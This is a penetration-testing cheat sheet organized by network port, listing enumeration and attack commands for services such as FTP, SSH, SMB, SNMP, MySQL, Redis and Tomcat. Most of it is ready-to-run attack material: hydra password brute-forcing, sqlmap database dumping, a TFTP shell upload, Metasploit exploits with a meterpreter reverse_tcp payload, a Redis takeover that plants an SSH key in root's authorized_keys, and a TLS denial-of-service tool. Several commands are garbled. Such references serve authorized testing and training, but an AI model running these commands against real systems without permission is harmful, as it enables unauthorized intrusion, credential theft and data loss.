Common Ports

21 - FTP

Many FTP servers allow anonymous users and might be misconfigured and give too much access. Always try to login as an anonymous user (anonymous:anonymous). It is also important to remember the binary and ascii mode. If you upload a binary file you to put the server in binary mode typing binary and the same with text-files, typing ascii.

Connect to the FTP server:

ftp $ip

nc $ip 21

Anonymous FTP dump with Nmap:

nmap -v -p 21 --script=ftp-anon.nse $ip-254

Enumerate:

nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip

Bruteforce

hydra -l user -P /usr/share/john/password.lst [ftp://:21$ip](ftp://:21$ip)

Bruteforce with metasploit:

msfconsole -q
msf> search type: auxiliary login
msf> use auxiliary/scanner/ftp/ftp_login

Vulnerability scan:

nmap --script=ftp-* -p 21 $ip

22 - SSH

You can find the version of SSH either by scanning it with nmap or by connecting to it with nc:

nc $ip 22

User enumeration:

msf > use auxiliary/scanner/ssh/ssh_enumusers

python /usr/share/exploitdb/platforms/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip

Bruteforce:

hydra -v -V -l root -P /usr/share/wordlists/rockyou.txt $ip ssh

Bruteforce with list of users:

hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 $ip ssh

23 - Telnet

Telnet is considered insecure mainly because it does not encrypt its traffic. Also a quick search in exploit-db will show that there are various RCE vulnerabilities on different versions that might be worth checking out.

Bruteforce:

hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt $ip telnet

25 - SMTP

SMTP is a server to server service. The user receives or sends emails using IMAP or POP3. Those messages are then routed to the SMTP-server which communicates the email to another server. The SMTP-server has a database with all emails that can receive or send emails. We can use SMTP to query that database for possible email addresses. Notice that we cannot retrieve any emails from SMTP. We can only send emails.

Connect to SMTP:

nc $ip 25

telnet $ip 25

Possible commands to use after connection:

HELO - 
EHLO - Extended SMTP.
STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify is the email user's mailbox exists.

Verify if root exists:

VRFY root

Ask the server if root belongs to a mailing list:

EXPN root

Check for commands:

nmap -script smtp-commands.nse $ip

Enumerate users:

smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip

Enumerate users with metasploit:

msf > use auxiliary/scanner/smtp/smtp_enum

Enumeration and vulnerability scanning:

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip

Bruteforce:

hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V

Testing for open relay:

telnet $ip 25
EHLO root
MAIL <FROM:root@target.com>
RCPT <TO:example@gmail.com>
DATA
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.
.
QUIT

53 - DNS

Find name servers

host -t ns microsoft.com

Find email servers

host -t mx microsoft.com

Subdomain bruteforcing

for ip in $(cat list.txt); do host $ip.microsoft.com; done

Reverse dns lookup bruteforcing

for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"

Zone transfer request

host -l microsoft.com ns1.microsoft.com

dnsrecon -d [microsoft.com](<http://microsoft.com>) -t axfr

Finds nameservers for a given domain

host -t ns microsoft.com | cut -d " " -f 4 #

dnsenum microsoft.com

Nmap zone transfer scan

nmap [microsoft.com](<http://microsoft.com>) --script=dns-zone-transfer -p 53

Find the IP and authoritative servers

nslookup microsoft.com

UDP 69 - TFTP

This is a FTP server but it is using UDP.

If unauthenticated access is allowed with write permissions you can upload a shell:

tftp $ip
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]

79 - Finger

Users enumeration:

finger-user-enum.pl -U users.txt -t $ip

Enumeration with user:

finger username@$ip

80 - HTTP

Nikto:

nikto -h $ip

nikto -h <http://$ip>

Enumeration with Nmap:

nmap --script=http-enum -p80 -n $ip/24

Nmap methods testing:

nmap --script http-methods --script-args http-methods.url-path='/test' $ip

Nmap vulnerability scanning:

nmap --script=http-vuln* $ip

Directory discovery:

wget <https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web_Content/Top1000-RobotsDisallowed.txt>
gobuster dir -u <http://$ip> -w Top1000-RobotsDisallowed.txt

dirb $ip /usr/share/wordlists/dirb/common.txt

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u $ip

gobuster dir -u [<http://$ip/>](<http://$ip/>) -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

gobuster dir -u [<http://$ip/>](<http://$ip/>) -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e

cd /opt/dirsearch
python3 dirsearch.py -y <http://$ip/> -e .php

Wfuzz web bruteforcer:

wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test

wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"

wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ

Recurse level3

wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ

Banner grabbing:

./whatweb $ip # identifies all known services

Open a service using a port knock (Secured with Knockd):

for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x server_ip_address; done

WordPress Scan - WordPress security scanner:

wpscan --url $ip/blog --proxy $ip:3129

RSH Enumeration - Unencrypted file transfer system:

msf > auxiliary/scanner/rservices/rsh_login

Bruteforcing authentication:

hydra $ip http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin

Test against SQLi:

sqlmap -u "[<http://$ip/?query>](<http://$ip/?query>)" --data="user=foo&pass=bar&submit=Login" --level=5 --risk=3 --dbms=mysql

Coldfusion vulnerability scanning:

nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip

Bruteforce basic auth

hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path

88 - Kerberos

Kerberos is a protocol that is used for network authentication. Different versions are used by *nix and Windows. But if you see a machine with port 88 open you can be fairly certain that it is a Windows Domain Controller.

Test MS14-068

Passive network sniffing:

kerbcrack

User enumeration:

nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=research $ip

Memory password extraction (pass the ticket attacks): Mimikatz

110 - POP3

This service is used for fetching emails on a email server. If the server has this port open then probably it is an email server and other clients on the network access it to fetch their emails.

If you find usernames and passwords for email accounts you can check the mail using Telnet:

telnet $ip 110
 +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready 
 USER billydean    
 +OK
 PASS password
 +OK Welcome billydean
 
 list
 
 +OK 2 1807
 1 786
 2 1021

 retr 1
 
 +OK Message follows
 From: jamesbrown@motown.com
 Dear Billy Dean,

 Here is your login for remote desktop ... try not to forget it this time!
 username: billydean
 password: PA$$W0RD!Z

111 - Rpc

Rpcbind can help us look for NFS-shares. So look out for nfs. Obtain list of services running with RPC:

rpcbind -p 192.168.1.101

Connect to an RPC share without a username and password and enumerate privileges:

rpcclient --user="" --command=enumprivs -N $ip

Connect to an RPC share with a username and enumerate privledges:

rpcclient --user="<Username>" --command=enumprivs $ip

135 - MSRPC

The Windows RPC Protocol.

Enumerate (shows if any NFS mount is exposed):

rpcinfo -p $ip

nmap $ip --script=msrpc-enum

msf > use exploit/windows/dcerpc/ms03_026_com

137 - NetBios

Dumping the netbios table:

nmap -Pn -sUC -p137 $ip

139/145 - SMB/Samba

Enumeration:

nmblookup -A $ip

enum4linux $ip

enum4linux -a $ip

smbclient //MOUNT/share -I $ip -N

rpcclient -U "" $ip

Quick enumeration:

nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip

Quick vulnerability scan:

nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip

Full enumeration and vulnerability scan:

nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip

Full enumeration and vulnerability scan without brute force and dos:

nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip

All smb scripts authenticated scan:

nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip

Enumerate users:

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14

python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip

Manual Null Session Testing:

Windows → net use \\\\$ip\\IPC$ "" /u:""

Linux → smbclient -L //$ip

See version metasploit:

msf > use scanner/smb/smb_version

MultiExploit metasploit:

msf > use exploit/multi/samba/usermap_script

Mount:

smbclient //$ip/share -U username

Anonymous mount:

smbclient //$ip/share

Bruteforce:

hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb

Connecting:

smbclient -L $ip
smbclient //$ip/tmp

smbclient -L \\\\\\\\$ip\\\\

smbclient //$ip/ipc$ -U john

Connecting with PSExec in Metasploit:

msf > use exploit/windows/smb/psexec

Connecting with PSExec with credentials:

psexec.py DOMAIN/username:password@$ip

161/162 - SNMP

SNMP is a network protocol used for collection, organizing and exchanging information between network devices. It runs on managed switches, routers, and server OSs for monitoring purposes. SNMP is accesed upon providing a valid community string within a UDP datagram to port 161. It is usually public. Within SNMP you can see running processes, open ports, users, windows version, installed software, etc.

Fix SNMP output values so they are human readable:

apt-get install snmp-mibs-downloader download-mibs echo "" > /etc/snmp/snmp.conf

Enumeration:

for community in public private manager; do snmpwalk -c $community -v1 $ip; done

for community in public private manager; do snmpwalk -c $community -v1 $ip; done

snmpenum $ip public windows.txt

Less noisy:

snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25

Based on UDP, stateless and susceptible to UDP spoofing:

nmap -sU --open -p 16110.1.1.1-254 -oG out.txt

snmpwalk -c public -v1 10.1.1.1 # we need to know that there is a community called public

snmpwalk -c public -v 2c  10.1.1.1 # version 2

snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows users

snmpwalk 5c public 5v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes

nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip

snmp-check -t $ip -c public

SNMPv3 Enumeration:

nmap -sV -p 161 --script=snmp-info $ip/24

Automate the username enumeration process for SNMPv3:

apt-get install snmp snmp-mibs-downloader

wget <https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb>

SNMP Default Credentials:

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

Bruteforce the community names:

onesixtyone -c dict.txt -i $ip

Against cisco using metasploit:

msf > use auxiliary/scanner/snmp/cisco_config_tftp

Scanning using metasploit:

msf > use auxiliary/scanner/snmp/snmp_login

389/636 - LDAP

This port is usually used for Directories. Ldap directory can be understood a bit like the windows registry or a database-tree, since directory here means more like a telephone-list than a folder. Ldap is usually used to store user infomration in corporate structures. Web apps can use ldap for authentication which means you can perform ldap-injections.

Sometimes you can access ldap using an anonymous login and find some valuable data about users.

Enumeration:

ldapsearch -h $ip -p 389 -x -b "dc=mywebsite,dc=com"

443 - HTTPS

Encrypted version of the HTTP protocol. Always check for SSL vulnerabilites such as heartbleed.

OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable

OpenSSL 1.0.1g is NOT vulnerable

OpenSSL 1.0.0 branch is NOT vulnerable

OpenSSL 0.9.8 branch is NOT vulnerable

First we need to investigate if the https-page is vulnerable to heartbleed:

sudo sslscan $ip:443

nmap -sV --script=ssl-heartbleed 192.168.101.8

Open a connection

openssl s_client -connect $ip:443

Basic SSL ciphers check:

nmap --script ssl-enum-ciphers -p 443 $ip

Exploiting with metasploit:

msf > use auxiliary/scanner/ssl/openssl_heartbleed

Notes:

Look for unsafe ciphers such as Triple-DES and Blowfish

A very complete tool for SSL auditing is testssl.sh, finds BEAST, FREAK, POODLE, heart bleed, etc...

443 - TLS

Transport Layer Security, or TLS, is a widely adopted security protocol designed to facilitate privacy and data security for communications over the Internet. A primary use case of TLS is encrypting the communication between web applications and servers, such as web browsers loading a website. TLS evolved from SSL.

Enumerating supported protocols and cipher suites:

python prober.py $ip

Enumerating supported features and extensions:

nmap --script ssl-enum-ciphers -p443

Certificate review:

nmap -p443 --script ssl-cert

You should validate that:

The X.509 subject common name (CN) is correct for the service
The issuer is reputable and certificate chain valid
RSA or DSA public key values are longer than 2,048 bits
DH public parameters are longer than 2,048 bits
The certificate is valid and has not expired
The certificate is signed using SHA-256

Vulnerabilites:

POODLE against CBC mode ciphers within SSL 3.0
BEAST against CBC mode ciphers via TLS 1.0
Byte biases in RC4 ciphers across all SSL and TLS protocol versions

Validate if the key was generated with weak entropy:

nmap -p443 --script ssl-known-key $1

Test failback:

openssl s_client -connect $ip -no_tls1_2 -fallback_scsv

Test Dos:

thc-ssl-dos $ip

UDP 500 - IPsec

IPsec tries to solve the confidentiality/integrity problems of the IP protocol. It provides HMAC of the origin and encrypts data.

You can find hosts supporting ipsec with:

ike-scan -q $iprange

Validate the follow:

DH group can be insecure, allowing passive decryption.
Preshared key (PSK) might be cracked.
Obtaining the XAUTH once the PSK is known.
For more info, refer to:

https://www.trustwave.com/Resources/SpiderLabs-Blog/Cracking-IKE-Mission-Improbable-(Part-1)/

587 - Submission

Outgoing smtp-port

If Postfix is run on it it could be vunerable to shellshock: https://www.exploit-db.com/exploits/34896/

631 - Cups

Common UNIX Printing System has become the standard for sharing printers on a linux-network. You will often see port 631 open in your priv-esc enumeration when you run netstat. You can log in to it here: http://localhost:631/admin

You authenticate with the OS-users.

Find version. Test cups-config --version. If this does not work surf to http://localhost:631/printers and see the CUPS version in the title bar of your browser.

There are vulnerabilities for it so check your searchsploit.

1433 - MsSQL

Default port for Microsoft SQL database.

Enumerate MSSQL Servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping

nmap -sU --script=ms-sql-info $ip

Bruteforce MsSql with metasploit:

msf > use auxiliary/scanner/mssql/mssql_login

Gain shell using gathered credentials with metasploit:

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

root@kali:~/dirsearch# cat ../.freetds.conf
[someserver]
host = $ip
port = 1433
tds version = 8.0
user=sa

root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME

1521 - Oracle DB

Enumeration:

tnscmd10g version -h $ip
tnscmd10g status -h $ip

Bruteforce the ISD with metasploit:

msf > use auxiliary/scanner/oracle/sid_brute

Connect to the database with sqlplus

1723 - PPTP

Point-to-Point Tunneling Protocol provides remote access to mobile devices, uses TCP port 1723 for key exchange and IP protocol 47 (GRE) to encrypt data between peers.

Enumeration:

nmap –Pn -sSV -p1723 $ip

Bruteforce:

cat dic.txt | thc-pptp-bruter –u admin $ip

2049 - NFS

Network file system This is a service used so that people can access certain parts of a remote filesystem. If this is badly configured it could mean that you grant excessive access to users.

Show Mountable NFS Shares:

nmap -sV --script=nfs-showmount $ip

Show all mounts:

showmount -e $ip

Mount a NFS share

mount $ip:/vol/share /mnt/nfs

2100 - Oracle XML DB

There are some exploits for this, so it is useful to check it out. You can use the default Oracle users to access to it. You can use the normal ftp protocol to access it.

Some default passwords here:

https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm

Default logins → sys:sys / scott:tiger

3306 - MySQL

Nmap scan:

nmap -sV -Pn -vv -script=mysql* $ip -p 3306

Vulnerability scan:

sqlmap -u '<http://$ip/login-off.asp>' --method POST --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all

Enumeration and vulnerability scanning:

nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306

If Mysql is running as root and you have acces, you can run commands:

mysql> select do_system('id');
mysql> \\! sh

Always test the following:

username: root

password: root

mysql --host=$ip -u root -p
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
mysql -h <Hostname> -u ""@localhost

telnet $ip 3306

Configuration files:

cat /etc/my.cnf

MySQL commands cheat sheet:

http://cse.unl.edu/~sscott/ShowFiles/SQL/CheatSheet/SQLCheatSheet.html

If with a shell, find login credentials for the database:

/var/www/html/configuration.php

<?php
class JConfig {
    var $mailfrom = 'admin@rainng.com';
    var $fromname = 'testuser';
    var $sendmail = '/usr/sbin/sendmail';
    var $password = 'myPassowrd1234';
    var $sitename = 'test';
    var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';
    var $MetaKeys = 'joomla, Joomla';
    var $offline_message = 'This site is down for maintenance. Please check back again soon.';
    }

3389 - RDP

This is a proprietary protocol developed by windows to allow remote desktop.

rdesktop -u guest -p guest $ip -g 94%

Bruteforce:

ncrack -vv --user administrator -P password-file.txt rdp://$ip

hydra -t 4 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip

5900 - VNC

VNC is used to get a screen for a remote host
You can use vncviewer to connect to a vnc-service
Vncviewer comes built-in in Kali
You do not have to set a username
VNC is run as a specific user, so when you use VNC it assumes that user
If you have dumped and cracked the user password on a machine does not mean you can use them to log in
To find the VNC password you can use the metasploit/meterpreter post exploit module that dumps VNC passwords

Scan for logins using metasploit:

msf > use auxiliary/scanner/vnc/vnc_login

Scan for no-auth:

msf > use auxiliary/scanner/vnc/vnc_none_auth

Meterpreter post exploitation module:

background
use post/windows/gather/credentials/vnc
set session X
exploit

5985 - WinRM

This is the Windows Remote Management tool. It allows remote management, meaning that any server that has this service allows us to connect to it if you have credentials and permissions to use it.

Connect:

cd /opt/
git clone <https://github.com/Hackplayers/evil-winrm.git>
evil-winrm -i $ip -u username -p password

6379 - Redis

Enumerate:

nmap -p6379 --script redis-info $ip

Client:

redis-cli -h $ip

Exploitation:

We first telnet to the server and check whether a successful connection is possible or not:

telnet $ip 6379

We then terminate the telnet session. Next, we generate our SSH key using the following command:

ssh-keygen -t rsa -C youremail@example.

Then, we enter the file where we want to save it:

Enter the file in which to save the key (/root/.ssh/id_rsa): ./ida_rsa_

Our key is generated; now we need to write it on the server. To do that need to install redis-cli:

sudo apt install redis-tools

Once it is installed, we go back to our generated key and add some random data before and after our key:

(echo -e "\\n\\n"; cat id_rsa.pub; echo -e "\\n\\n") > key.txt

Now we need to replace the keys in the database with ours. So we connect to the host using this:

redis-cli -h $ip

Next we flush the keys using the following command:

redis-cli -h $ip -p 6350 flushall

Now we need to set our keys into the database. We do this using the following command::

cat redis.txt | redis-cli –h $ip –p 6451 -x set bb

Once that's done, we need to copy the uploaded key into the .ssh folder; first, we check the current folder with this:

config get dir

Now we change our directory to /root/.ssh/:

config set dir /root/.ssh/

Next, we change the name of our file using config set dbfilename "authorized_keys" and save using save.
Now we try to ssh into the machine:

ssh -i id_rsa username@$ip

8080 - Tomcat (one of the most common)

Tomcat suffers from default passwords. There is even a module in metasploit that enumerates common tomcat passwords. And another module for exploiting it and giving you a shell.

Tests whether a directory traversal vulnerability is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 - 6.0.16 under specific and non-default installations:

msf > use auxiliary/admin/http/tomcat_utf8_traversal
msf auxiliary(tomcat_utf8_traversal) > show actions
    ...actions...
msf auxiliary(tomcat_utf8_traversal) > set ACTION < action-name >
msf auxiliary(tomcat_utf8_traversal) > show options
    ...show and set options...
msf auxiliary(tomcat_utf8_traversal) > run

Enumerating Apache Tomcat's usernames via malformed requests to j_security_check, which can be found in the web administration package. It should work against Tomcat servers 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18:

msf > use auxiliary/scanner/http/tomcat_enum
msf auxiliary(tomcat_enum) > show actions
    ...actions...
msf auxiliary(tomcat_enum) > set ACTION < action-name >
msf auxiliary(tomcat_enum) > show options
    ...show and set options...
msf auxiliary(tomcat_enum) > run

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show actions
    ...actions...
msf auxiliary(tomcat_mgr_login) > set ACTION < action-name >
msf auxiliary(tomcat_mgr_login) > show options
    ...show and set options...
msf auxiliary(tomcat_mgr_login) > run

8080 - WebDav

Test:

davtest -move -sendbd auto -url http://:8080$ip/webdav/

cadaver http://:8080$ip/webdav/

11211 - Memcached

Enumerate:

nmap -p11211 --script memcached-info $ip

Extract data with metasploit:

msf > use auxiliary/gather/memcached_extractor

PreviousEnumeration NextVulnerability Analysis

Last updated 5 years ago

Was this helpful?